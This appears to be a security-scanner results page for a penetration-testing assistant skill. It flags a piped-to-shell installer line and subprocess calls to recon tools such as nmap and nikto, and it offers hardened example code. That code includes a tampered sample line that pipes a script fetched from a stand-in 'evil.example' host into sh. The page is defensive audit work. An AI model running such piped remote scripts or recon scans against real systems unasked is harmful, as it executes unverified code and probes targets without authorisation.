metatron-pentest-assistant

github.com/aradotso/trending-skills
Verdict: Proceed with caution
0 critical · 1 high · 9 medium
Grade C · score 55 / 100

Why grade C?

score · 55 / 100

The current grade reflects 9 medium findings (6+ MEDs → C).

0 CRIT · 1 HIGH · 9 MED · 0 LOW
To reach a higher grade
  • B (target score 75): resolve 4 of 9 MED (cap is 5).
  • A (target score 95): resolve the 1 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-gw7erb5xuebkarf6csp0uy0f · Thu, 28 May 2026 17:30:27 GMT · 2ms

high
Dangerous shell pattern: curl | shell
The skill contains a shell command pattern (`curl | shell`) commonly used in destructive or supply-chain attacks: whatever the remote host serves at install time is executed as-is, with no checksum or signature check and no chance to read the script first. The flagged line sits inside a fenced ```bash block (line 58), so it is install guidance the user is told to paste into a terminal rather than code the skill runs by itself; the risk is the same either way.
rule: dangerous-shell · line: 59 · CWE-78

    57
    58  ```bash
    59  curl -fsSL https://ollama.com/install.sh | sh
    60
    61  # 8GB+ RAM:
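The usual fix for this finding is download-then-verify: fetch the script to disk, compare its SHA-256 against a digest obtained out of band, and only then hand it to `sh`. The block below is an added example, not code from the scanned skill or from Ollama. The sample installer bytes and their digest are constructed for the demonstration; `fetch`, `verify_pinned`, `run_installer` and `install_pinned` are names chosen here, and the pin in real use comes from the vendor's release page or a previously reviewed copy, never from the download you are about to run.

```python
"""Download, pin, then execute: a replacement for `curl ... | sh`.

Added example, not code from the scanned skill or from Ollama. The sample
installer bytes and their digest are constructed here for demonstration; a
real pin must come from an out-of-band source (vendor release notes, a
previously reviewed copy), never from the download you are about to run.
"""
import hashlib
import hmac
import subprocess
import tempfile
import urllib.request
from pathlib import Path

INSTALLER_URL = "https://ollama.com/install.sh"   # URL from the flagged line

# Constructed sample standing in for a reviewed installer script.
SAMPLE_INSTALLER = b"#!/bin/sh\necho 'installed'\n"
# For the demo the pin is derived from the sample; in practice it is a hex
# literal copied from a trusted source into your config, not computed here.
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_INSTALLER).hexdigest()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned(data: bytes, expected_sha256: str) -> bool:
    """True only if the bytes hash to the pinned digest (hex, case-insensitive)."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256.strip().lower())


def fetch(url: str, timeout: int = 30) -> bytes:
    """Download the script into memory; nothing is executed here."""
    if not url.startswith("https://"):
        raise ValueError("refusing non-HTTPS installer URL")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def run_installer(data: bytes, expected_sha256: str, dry_run: bool = False) -> int:
    """Execute the script with sh only after the digest check passes.

    Returns sh's exit status; with dry_run=True it verifies but does not run
    and returns 0.
    """
    if not verify_pinned(data, expected_sha256):
        raise ValueError("installer digest mismatch; refusing to execute")
    if dry_run:
        return 0
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as f:
        f.write(data)
        path = Path(f.name)
    try:
        # argv list, no shell string: the script path is the only argument.
        return subprocess.run(["sh", str(path)], timeout=600).returncode
    finally:
        path.unlink(missing_ok=True)


def install_pinned(url: str, expected_sha256: str) -> int:
    """Full flow: fetch, verify against the out-of-band pin, execute."""
    return run_installer(fetch(url), expected_sha256)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    print("pin ok:", verify_pinned(SAMPLE_INSTALLER, SAMPLE_SHA256))
    tampered = SAMPLE_INSTALLER + b"curl https://evil.example/x | sh\n"
    print("tampered ok:", verify_pinned(tampered, SAMPLE_SHA256))
```

The digest check sits between download and execution, so a server that changes the script (or a compromised CDN) produces a mismatch instead of a silent run; the cost is that the pin must be refreshed whenever the vendor legitimately updates the installer, which is exactly the review step the one-liner skips.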
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 266 · CWE-78

    264  def run_nmap(target: str) -> str:
    265      """Run nmap service/version scan."""
    266      result = subprocess.run(
    267          ["nmap", "-sV", "-sC", "-T4", target],
    268          capture_output=True, text=True, timeout=120

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 273 · CWE-78

    271
    272  def run_whois(target: str) -> str:
    273      result = subprocess.run(
    274          ["whois", target],
    275          capture_output=True, text=True, timeout=30

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 280 · CWE-78

    278
    279  def run_whatweb(target: str) -> str:
    280      result = subprocess.run(
    281          ["whatweb", "-a", "3", target],
    282          capture_output=True, text=True, timeout=60

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 287 · CWE-78

    285
    286  def run_curl_headers(target: str) -> str:
    287      result = subprocess.run(
    288          ["curl", "-I", "-L", "--max-time", "15", target],
    289          capture_output=True, text=True, timeout=20

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 294 · CWE-78

    292
    293  def run_dig(target: str) -> str:
    294      result = subprocess.run(
    295          ["dig", target, "ANY"],
    296          capture_output=True, text=True, timeout=15

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 302 · CWE-78

    300  def run_nikto(target: str) -> str:
    301      """Slow but thorough web scanner."""
    302      result = subprocess.run(
    303          ["nikto", "-h", target],
    304          capture_output=True, text=True, timeout=300

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 506 · CWE-78

    504  # In tools.py — add your tool function:
    505  def run_gobuster(target: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt") -> str:
    506      result = subprocess.run(
    507          ["gobuster", "dir", "-u", f"http://{target}", "-w", wordlist],
    508          capture_output=True, text=True, timeout=180

med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 562 · CWE-78

    560  Nikto is slow by design. Either use `[a]` (all without nikto) or increase the subprocess timeout in `tools.py`:
    561  ```python
    562  result = subprocess.run(["nikto", "-h", target],
    563                          capture_output=True, text=True,
    564                          timeout=600)  # 10 minutes
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
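Two things are worth noting across the eight subprocess findings and the missing-manifest finding. First, every flagged call passes an argv list and never sets `shell=True`, so shell metacharacters in `target` do not reach a shell and the CWE-78 tag overstates that particular hazard; what remains is argument injection (a `target` beginning with `-` is parsed by nmap, dig or whois as an option rather than a host) and, in `run_gobuster`, string interpolation of `target` into a URL. Second, the scanner wants the spawned tools declared up front so the runtime can enforce them. The block below is an added example, not the skill's own code, showing one way `tools.py` could do both: a fixed per-tool argv template that acts as the capability allowlist, a target validator that accepts only a bare hostname or IP literal, and a single `run_tool` wrapper with a hard timeout. `TOOL_POLICY`, `validate_target`, `build_command` and `run_tool` are names chosen here, and `TOOL_POLICY` is a hypothetical stand-in for skillox's manifest, whose real schema this page does not show.

```python
"""Hardened replacement for the subprocess.run() calls in tools.py.

Added example, not the skill's own code. TOOL_POLICY is a hypothetical
stand-in for the capability manifest the scanner asks for; the real skillox
manifest schema is not shown on the scan page.
"""
import ipaddress
import re
import shutil
import subprocess

# Hypothetical allowlist: tool -> fixed argv template. "{target}" is the only
# slot user data may fill; every flag is fixed so a caller cannot add one.
TOOL_POLICY = {
    "nmap":    ["-sV", "-sC", "-T4", "{target}"],
    "whois":   ["{target}"],
    "whatweb": ["-a", "3", "{target}"],
    "dig":     ["{target}", "ANY"],
    "nikto":   ["-h", "{target}"],
}

# DNS name grammar: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, 253 characters total at most.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_target(target: str) -> str:
    """Return the target if it is a bare hostname or IP literal, else raise.

    A leading '-' is refused so the value cannot be parsed by the tool as an
    option (argument injection); spaces, slashes, semicolons and other shell
    text are refused because no hostname contains them.
    """
    t = target.strip()
    if not t or t.startswith("-"):
        raise ValueError(f"refusing option-like or empty target: {target!r}")
    try:
        ipaddress.ip_address(t)      # accepts IPv4 and IPv6 literals
        return t
    except ValueError:
        pass
    if _HOST_RE.match(t):
        return t
    raise ValueError(f"target is not a hostname or IP literal: {target!r}")


def build_command(tool: str, target: str) -> list[str]:
    """Expand the policy template for `tool`; refuse tools not declared."""
    if tool not in TOOL_POLICY:
        raise PermissionError(f"{tool!r} is not a declared capability")
    t = validate_target(target)
    return [tool] + [arg.replace("{target}", t) for arg in TOOL_POLICY[tool]]


def run_tool(tool: str, target: str, timeout: int = 120) -> str:
    """Run a declared tool with an argv list (no shell) and a hard timeout."""
    argv = build_command(tool, target)
    exe = shutil.which(argv[0])
    if exe is None:
        raise FileNotFoundError(f"{tool} is not installed or not on PATH")
    argv[0] = exe                    # absolute path: no PATH lookup at exec time
    try:
        result = subprocess.run(
            argv, capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return f"[{tool} timed out after {timeout}s]"
    if result.returncode != 0:
        return f"[{tool} exited {result.returncode}] {result.stderr.strip()}"
    return result.stdout


if __name__ == "__main__":
    print(build_command("nmap", "scanme.nmap.org"))
    for bad in ("-iL", "example.com; id", "http://example.com/"):
        try:
            build_command("nmap", bad)
        except ValueError as err:
            print("rejected:", err)
```

With this in place each `run_*` function in `tools.py` collapses to `return run_tool("nmap", target, timeout=120)` and so on; adding gobuster means adding a template entry (and validating the wordlist path separately), which is the declaration step the no-manifest finding is asking for, even if the final format has to match whatever `manifest.yaml` schema skillox documents.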
skillox.io/c/metatron-pentest-assistant